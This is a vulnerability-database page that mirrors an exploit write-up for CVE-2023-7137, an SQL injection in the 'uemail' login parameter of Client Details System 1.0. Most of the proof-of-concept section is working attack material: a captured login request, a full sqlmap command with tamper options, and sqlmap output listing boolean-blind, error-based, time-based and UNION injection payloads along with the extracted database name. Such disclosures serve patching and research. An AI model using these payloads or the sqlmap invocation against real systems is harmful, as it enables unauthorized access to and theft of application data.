Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Client Details System 1.0 SQL Injection

🗓️ 13 Mar 2024 00:00:00Reported by Hamdi SevbenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 369 Views

Client Details System 1.0 SQL Injection via 'uemail' parameter in "/clientdetails/" could compromise application, access/modify data, exploit DB vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Client Details System 1.0 - SQL Injection Vulnerability
12 Mar 202400:00
zdt
Circl		CVE-2023-7137
28 Dec 202323:26
circl
CNNVD		Client Details System SQL Injection Vulnerability
28 Dec 202300:00
cnnvd
CVE		CVE-2023-7137
28 Dec 202321:31
cve
Cvelist		CVE-2023-7137 code-projects Client Details System HTTP POST Request sql injection
28 Dec 202321:31
cvelist
Exploit DB		Client Details System 1.0 - SQL Injection
12 Mar 202400:00
exploitdb
EUVD		EUVD-2023-59320
3 Oct 202520:07
euvd
NVD		CVE-2023-7137
28 Dec 202322:15
nvd
OSV		CVE-2023-7137
28 Dec 202322:15
osv
Prion		Sql injection
28 Dec 202322:15
prion
Rows per page
`+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1  
+ **Date:** 2023-26-12  
+ **Exploit Author:** Hamdi Sevben  
+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/  
+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip  
+ **Version:** 1.0  
+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53  
+ **CVE:** CVE-2023-7137  
  
## References:   
+ **CVE-2023-7137:** https://vuldb.com/?id.249140  
+ https://www.cve.org/CVERecord?id=CVE-2023-7137  
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137  
+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137  
  
## Description:  
Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.  
  
## Proof of Concept:  
+ Go to the User Login page: "http://localhost/clientdetails/"  
+ Fill email and password.  
+ Intercept the request via Burp Suite and send to Repeater.  
+ Copy and paste the request to a "r.txt" file.  
+ Captured Burp request:  
```  
POST /clientdetails/ HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Content-Length: 317  
Content-Type: application/x-www-form-urlencoded  
Referer: http://localhost/clientdetails/  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36  
  
[email protected]&login=LOG+IN&password=P@ass123  
```  
  
+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database.   
```  
python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db  
```  
  
```  
---  
Parameter: uemail (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: [email protected]' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: [email protected]' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: [email protected]' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 7 columns  
Payload: [email protected]' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123  
---  
[14:58:11] [INFO] the back-end DBMS is MySQL  
web application technology: Apache 2.4.53, PHP, PHP 8.1.6  
back-end DBMS: MySQL >= 5.0 (MariaDB fork)  
[14:58:11] [INFO] fetching current database  
current database: 'loginsystem'  
```  
  
+ current database: `loginsystem`  
![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.16.3 - 8.8
CVSS 25.8
CVSS 36.3
EPSS0.04556
cve-2023-7137sql injectionclient details system 1.0exploitvendorphp 8.1.6apache 2.4.53windows 10 prodatabase access
369